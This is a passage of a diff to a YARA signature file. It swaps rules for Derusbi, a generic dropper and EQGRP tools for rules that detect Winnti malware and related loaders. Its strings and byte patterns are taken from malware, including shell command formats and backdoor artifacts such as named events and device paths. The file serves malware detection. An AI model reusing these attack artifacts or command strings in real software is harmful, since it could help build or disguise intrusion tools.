+		id = "591ad72d-b9d4-5cd9-9103-37e001026610"
+		date = "2015-10-10"
+		modified = "2023-01-06"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L90-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dae976a4896a4f6b6a1b415582db84f3da5aac03bf4079f75e11c790dcf23900"
-		score = 60
+		logic_hash = "6e87b06f6bf11dceb04c8eb4910f5d98ec3fe430fa984eeed8b73e99b28c5abe"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
+		hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
+		hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
 
 	strings:
-		$s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
-		$s2 = "XL Games Co.,Ltd.0" fullword ascii
-		$s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
+		$s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" wide
+		$s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
+		$s2 = "FWPKCLNT.SYS" fullword ascii
+		$s3 = "Port Layer" fullword wide
+		$s4 = "%x->%x, icmp type %d, code %d" fullword ascii
+		$s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" wide
+		$s6 = "\\Ndi\\Interfaces" wide
+		$s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" wide
+		$s8 = "Bad packet" fullword ascii
+		$s9 = "\\BaseNamedObjects\\EKV0000000000" wide
+		$s10 = "%x->%x" fullword ascii
+		$s11 = "IPInjectPkt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 642KB and all of them
 }
-rule SIGNATURE_BASE_XOR_4Byte_Key : FILE
+rule SIGNATURE_BASE_Winnti_Malware_Streamportal_Gen : FILE
 {
 	meta:
-		description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
+		description = "Detects a Winnti malware - Streamportal"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77850332-87ce-5ed3-bb09-88e91e5bb5f6"
-		date = "2015-12-15"
-		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L98-L121"
+		id = "f9d31d6b-a6f7-5359-b741-960b678e0b9c"
+		date = "2015-10-10"
+		modified = "2025-08-11"
+		reference = "VTI research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L119-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61cbdac3fd9a486d85261234698f33aa04d505b32dfec731de6fc61d103bf609"
-		score = 60
+		logic_hash = "249f51b263fbcab650983d75482fd4787934731e415fcbd0e6f6925032aac690"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
 
 	strings:
-		$s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
+		$s0 = "Proxies destination address/port for TCP" fullword wide
+		$s3 = "\\Device\\StreamPortal" wide
+		$s4 = "Transport-Data Proxy Sub-Layer" fullword wide
+		$s5 = "Cookie: SN=" fullword ascii
+		$s6 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
+		$s17 = "NTOSKRNL.EXE" fullword wide
+		$s19 = "FwpsReferenceNetBufferList0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 275KB and all of them
 }
-rule SIGNATURE_BASE_Derusbi_Backdoor_Mar17_1 : FILE
+
+rule SIGNATURE_BASE_WINNTI_Kingsoft_Moz_Confustion : FILE
 {
 	meta:
-		description = "Detects a variant of the Derusbi backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c8838d6-b9c2-589e-b6a2-a8c7ad6f10cc"
-		date = "2017-03-03"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_derusbi.yar#L123-L143"
+		description = "Detects Barium sample with Copyright confusion"
+		author = "Markus Neis"
+		id = "0c45c1ff-6734-504f-91d1-cf5d6744252f"
+		date = "2018-04-13"
+		modified = "2025-08-11"
+		reference = "https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "068a8d5c7378c6cf9d0369374550cd34b54e9f913aa7512a6beb46395fc15b19"
+		logic_hash = "ebd8465f484e1142ac741263282ea1c6f98e6bd0637ebdcec6ecc6233193407e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f87915f21dcc527981ebb6db3d332b5b341129b4af83524f59d7178e9d2a3a32"
-
-	strings:
-		$x1 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
-		$x2 = "c%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword wide
-		$x3 = "%Systemroot%\\Help\\perfc009.dat" fullword wide
-		$x4 = "rundll32.exe \"%s\", R32 %s" fullword wide
-		$x5 = "OfficeUt32.dll" fullword ascii
-		$x6 = "\\\\.\\pipe\\usb%so" fullword wide
-		$x7 = "\\\\.\\pipe\\usb%si" fullword wide
-		$x8 = "\\tmp1.dat" wide
+		hash1 = "070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "7f01b23ccfd1017249c36bc1618d6892" or ( pe.version_info [ "LegalCopyright" ] contains "Mozilla Corporation" and pe.version_info [ "ProductName" ] contains "Kingsoft" ) )
 }
-rule SIGNATURE_BASE_Generic_Dropper : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_1 : FILE
 {
 	meta:
-		description = "Detects Dropper PDB string in file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "60ce6a5c-2e12-515b-b8cb-8c87500cb37b"
-		date = "2018-03-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_dropper_pdb.yar#L2-L17"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "322e9362-bfb6-55e3-9a93-d54246311d11"
+		date = "2019-12-06"
+		modified = "2025-06-03"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L160-L181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4ef83796d232edf34a6339e00db486612a88ff2d054f1afcd524def2e53b3b7"
+		logic_hash = "2ffeb40b096e5112adbb9c07b27b954424d6ef11a0a9bd736b43df9aa1e9af3e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Release\\Dropper.pdb"
-		$s2 = "\\Release\\dropper.pdb"
-		$s3 = "\\Debug\\Dropper.pdb"
-		$s4 = "\\Debug\\dropper.pdb"
+		$e1 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii nocase
+		$e2 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii nocase
+		$e3 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii nocase
+		$e4 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
+		$e5 = "BFE_Notify_Event_{7D00FA3C-FBDC-4A8D-AEEB-3F55A4890D2A}" nocase
+		$fp1 = "also increase possible memory usage of THOR."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $e* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EQGRP_Noclient_3_0_5 : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_2
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af7472ce-0605-5f50-8180-23438d2196b8"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L12-L29"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "77f2cb7d-90a6-5654-9d2e-6b525cd910a2"
+		date = "2019-12-06"
+		modified = "2025-08-11"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L183-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51a6bf03c8d034942bf02fae2bea52436f53b4d437006b1dbe9c0c67387fe17a"
+		logic_hash = "216557999b7100f26556f9f7088b16ba125ac39b308cb77c997d620ce9591d24"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii
-		$x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." fullword ascii
-		$x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
-		$x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii
-		$x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" fullword ascii
+		$a1 = "IPSecMiniPort" wide fullword
+		$a2 = "ndis6fw" wide fullword
+		$a3 = "TCPIP" wide fullword
+		$a4 = "NDIS.SYS" ascii fullword
+		$a5 = "ntoskrnl.exe" ascii fullword
+		$a6 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
+		$a7 = "\\Device\\Null" wide
+		$a8 = "\\Device" wide
+		$a9 = "\\Driver" wide
+		$b1 = { 66 81 7? ?? 70 17 }
+		$b2 = { 81 7? ?? 07 E0 15 00 }
+		$b3 = { 8B 46 18 3D 03 60 15 00 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them )
+		(6 of ( $a* ) ) and ( 2 of ( $b* ) )
 }
-rule SIGNATURE_BASE_EQGRP_Installdate : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_3
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file installdate.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "029b1213-1206-5b7c-bd72-93239a23fe8a"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L31-L50"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "2e001c91-0794-5940-ad8c-8e58a01e100c"
+		date = "2019-12-06"
+		modified = "2025-08-11"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L208-L224"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "363a9c92c4d2560ba6dd0ec41acf136dff4346f20d54f971d319ed2aa531fe31"
+		logic_hash = "601f8a3cba57fea46c16c36f8276631fcd22feef4ea1388a1ea35b00929b9fbb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii
-		$x2 = "print \"Gimme hex: \";" fullword ascii
-		$x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii
-		$s1 = "if ($_ =~ /InstallDate/) {" fullword ascii
-		$s2 = "if (not($cmdInput)) {" fullword ascii
-		$s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii
+		$b1 = { 0F B7 ?? 16 [0-1] (81 E? | 25) 00 20 [8-10] 8B ?? 50 41 B9 40 00 00 00 41 B8 00 10 00 00 }
+		$b2 = { 8B 40 28 [5-8] 48 03 C8 48 8B C1 [5-8] 48 89 41 28 }
+		$b3 = { 48 6B ?? 28 [5-8] 8B ?? ?? 10 [5-8] 48 6B ?? 28 [5-8] 8B ?? ?? 14 }
+		$b4 = { 83 B? 90 00 00 00 00 0F 84 [9-12] 83 B? 94 00 00 00 00 0F 84 }
+		$b5 = { (45 | 4D) (31 | 33) C0 BA 01 00 00 00 [10-16] FF 5? 28 [0-1] (84 | 85) C0 }
 
 	condition:
-		filesize < 2KB and ( 1 of ( $x* ) or 3 of them )
+		(4 of ( $b* ) )
 }
-rule SIGNATURE_BASE_EQGRP_Teflondoor : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_4
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file teflondoor.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "188f9ef1-5524-50be-ac62-91cb9726b155"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L52-L73"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "1f7ac215-d049-5b97-9797-9589a70cbf2b"
+		date = "2019-12-06"
+		modified = "2025-08-11"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L226-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38be3cfa638509d539bf4ada3b5c7e44e01ee4cfb74a53a76cd2f4287c5a56f5"
+		logic_hash = "32909e915a6e602ad1e8698cf5c128c2e54670770b97f54b1414c5798c42cc00"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "%s: abort.  Code is %d.  Message is '%s'" fullword ascii
-		$x2 = "%s: %li b (%li%%)" fullword ascii
-		$s1 = "no winsock" fullword ascii
-		$s2 = "%s: %s file '%s'" fullword ascii
-		$s3 = "peer: connect" fullword ascii
-		$s4 = "read: write" fullword ascii
-		$s5 = "%s: done!" fullword ascii
-		$s6 = "%s: %li b" fullword ascii
+		$b1 = { 4C 8D 41 24 33 D2 B9 03 00 1F 00 FF 9? F8 00 00 00 48 85 C0 74 }
+		$b2 = { 4C 8B 4? 08 BA 01 00 00 00 49 8B C? FF D0 85 C0 [2-6] C7 4? 1C 01 00 00 00 B8 01 00 00 00 }
+		$b3 = { 8B 4B E4 8B 53 EC 41 B8 00 40 00 00 4? 0B C? FF 9? B8 00 00 00 EB }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) and 3 of them
+		(2 of ( $b* ) )
 }
-rule SIGNATURE_BASE_EQGRP_Durablenapkin_Solaris_2_0_1 : FILE
+rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_5
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7b49a26d-9ee3-5aff-93fc-509239daef28"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L75-L92"
+		description = "Detects Winnti malware"
+		author = "Unknown"
+		id = "2a8f28e6-5a01-5a2f-b89b-9c34163afcda"
+		date = "2019-12-06"
+		modified = "2025-08-11"
+		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L242-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "113f9451d6792511baa168957c643de02f37826b32944ef882f49b68496ec596"
+		logic_hash = "977d11fbb7cf4678d4da179c43d5566520ee97ac528e269a9b985e5bc75641b7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii
-		$s2 = "send_request: putmsg \"%s\": %s" fullword ascii
-		$s3 = "port undefined" fullword ascii
-		$s4 = "recv_ack: %s getmsg: %s" fullword ascii
-		$s5 = ">> %d -- %d" fullword ascii
+		$a1 = "-k netsvcs" ascii
+		$a2 = "svchost.exe" ascii fullword
+		$a3 = "%SystemRoot%\\System32\\ntoskrnl.exe" ascii
+		$a4 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii
+		$a5 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii
+		$a6 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii
+		$a7 = "cmd.exe" wide
+		$a8 = ",XML" wide
+		$a9 = "\\rundll32.exe" wide
+		$a10 = "\\conhost.exe" wide
+		$a11 = "\\cmd.exe" wide
+		$a12 = "NtQueryInformationProcess" ascii
+		$a13 = "Detours!" ascii fullword
+		$a14 = "Loading modified build of detours library designed for MPC-HC player (http://sourceforge.net/projects/mpc-hc/)" ascii
+		$a15 = "CONOUT$" wide fullword
+		$a16 = { C6 0? E9 4? 8? 4? 05 [2] 89 4? 01 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 2 of them )
+		(12 of ( $a* ) )
 }
-rule SIGNATURE_BASE_EQGRP_Teflonhandle : FILE
+rule SIGNATURE_BASE_APT_CN_Group_Loader_Jan20_1
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file teflonhandle.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4d82cc41-3777-5f8c-9392-aca69e6ed781"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L94-L111"
+		description = "Detects loaders used by Chinese groups"
+		author = "Vitali Kremez"
+		id = "c85ae499-4f76-56ff-877d-887e1a7fc077"
+		date = "2020-02-01"
+		modified = "2025-08-11"
+		reference = "https://twitter.com/VK_Intel/status/1223411369367785472?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L271-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7dfa713b763c983219f008405e1ebf3dfe386672f2d4e5fb54b2b362023ae08a"
-		score = 75
+		logic_hash = "30a180ada2390ca8df4bf7883624a5a176249622b4c34ce96931fe62b09ea8e3"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii
-		$s2 = "File %s already exists.  Overwrite? (y/n) " fullword ascii
-		$s3 = "Random Key : 0x" fullword ascii
-		$s4 = "done (%i bytes written)." fullword ascii
-		$s5 = "%s --> %s..." fullword ascii
+		$xc1 = { 8B C3 C1 E3 10 C1 E8 10 03 D8 6B DB 77 83 C3 13 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_False : FILE
+rule SIGNATURE_BASE_Winnti_Dropper_X64_Libtomcrypt_Fns : TAU CN APT
 {
 	meta:
-		description = "Detects tool from EQGRP toolset - file false.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3a68790b-38fc-570b-8b19-c5478cdd2842"
-		date = "2016-08-15"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L113-L134"
+		description = "Designed to catch winnti 4.0 loader and hack tool x64"
+		author = "CarbonBlack Threat Research"
+		id = "080d837c-248f-5718-b4a2-290495cd3b38"
+		date = "2019-08-26"
+		modified = "2025-08-11"
+		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L285-L332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1938bc7a5a7a1bb382c2bab976013a1adedc045e0312daabe1bdcdd65d0c606"
+		logic_hash = "39d23f2a12a3b78182e52847e2fdb2d09386765138c37eb7f75edfc680505531"
+		score = 75
+		quality = 83
+		tags = "TAU, CN, APT"
+		rule_version = 1
+		yara_version = "3.8.1"
+		Confidence = "Prod"
+		Priority = "High"
+		TLP = "White"
+		exemplar_hashes = "5ebf39d614c22e750bb8dbfa3bcb600756dd3b36929755db9b577d2b653cd2d1"
+		sample_md5 = "794E127D627B3AF9015396810A35AF1C"
+
+	strings:
+		$0x140001820 = { 48 83 EC 28 83 3D ?? ?? ?? ?? 00 }
+		$0x140001831 = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x140001842 = { B8 0B 00 E0 0C 48 83 C4 28 C3 }
+		$0x14000184c = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x140001881 = { B8 0C 00 E0 0C 48 83 C4 28 C3 }
+		$0x14000188b = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
+		$0x1400018e4 = { B8 0D 00 E0 0C 48 83 C4 28 C3 }
+		$0x1400018ee = { 48 8D 0D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B8 A0 01 00 00 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 01 00 00 00 }
+		$0x140001911 = { 33 C0 48 83 C4 28 C3 }
+		$0x140001670 = { 40 55 56 57 41 55 41 56 41 57 B8 38 12 00 00 E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 10 12 00 00 48 8B AC 24 90 12 00 00 4C 8B B4 24 A0 12 00 00 45 33 FF 44 39 3D ?? ?? ?? ?? 49 8B F1 41 0F B7 F8 4C 8B EA 44 8B D9 66 44 89 7C 24 40 }
+		$0x1400016c8 = { B8 01 00 E0 0C }
+		$0x1400016d2 = { 48 89 9C 24 30 12 00 00 4D 85 C9 }
+		$0x1400016ec = { 8B 9C 24 98 12 00 00 83 FB 01 }
+		$0x1400016fc = { 48 8D 54 24 40 }
+		$0x140001701 = { 4C 89 A4 24 28 12 00 00 E8 ?? ?? ?? ?? 44 0F B7 64 24 40 66 44 3B E7 }
+		$0x140001727 = { 48 8D 54 24 40 41 8B CB E8 ?? ?? ?? ?? 0F B7 94 24 A8 12 00 00 66 39 54 24 40 }
+		$0x140001750 = { 41 8B CB E8 ?? ?? ?? ?? 8B F8 83 F8 FF }
+		$0x14000175f = { B8 0F 00 E0 0C }
+		$0x140001764 = { 4C 8B A4 24 28 12 00 00 }
+		$0x14000176c = { 48 8B 9C 24 30 12 00 00 }
+		$0x140001774 = { 48 8B 8C 24 10 12 00 00 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 38 12 00 00 41 5F 41 5E 41 5D 5F 5E 5D C3 }
+		$0x140001795 = { 48 8D 4C 24 54 33 D2 41 B8 B4 11 00 00 44 89 7C 24 50 E8 ?? ?? ?? ?? 48 8D 44 24 50 48 89 44 24 30 45 0F B7 CC 4D 8B C5 49 8B D6 8B CF 44 89 7C 24 28 44 89 7C 24 20 E8 ?? ?? ?? ?? 85 C0 }
+		$0x1400017d5 = { 4C 8D 4C 24 50 44 8B C3 48 8B D5 48 8B CE E8 ?? ?? ?? ?? 48 8D 4C 24 50 8B D8 E8 ?? ?? ?? ?? 8B C3 }
+		$0x1400017fb = { B8 04 00 E0 0C }
+		$0x140001805 = { B8 03 00 E0 0C }
+		$0x14000180f = { B8 02 00 E0 0C }
+
+	condition:
+		all of them
+}
+rule SIGNATURE_BASE_Winnti_Dropper_X86_Libtomcrypt_Fns : TAU CN APT
+{
+	meta:
+		description = "Designed to catch winnti 4.0 loader and hack tool x86"
+		author = "CarbonBlack Threat Research"
+		id = "48e7a3b0-55c7-5db5-855f-1614bd00afb4"
+		date = "2019-08-26"
+		modified = "2025-08-11"
+		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti.yar#L334-L375"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "84bfe001758677ff3a0d60d98e29c33ad1525a0afb27b73df750b2131e298879"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "TAU, CN, APT"
+		rule_version = 1
+		yara_version = "3.8.1"
+		confidence = "Prod"
+		oriority = "High"
+		TLP = "White"
+		exemplar_hashes = "0fdcbd59d6ad41dda9ae8bab8fad9d49b1357282027e333f6894c9a92d0333b3"
+		sample_md5 = "da3b64ec6468a4ec56f977afb89661b1"
 
 	strings:
-		$s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75
-			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00
-			00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20
-			2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E
-			0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E
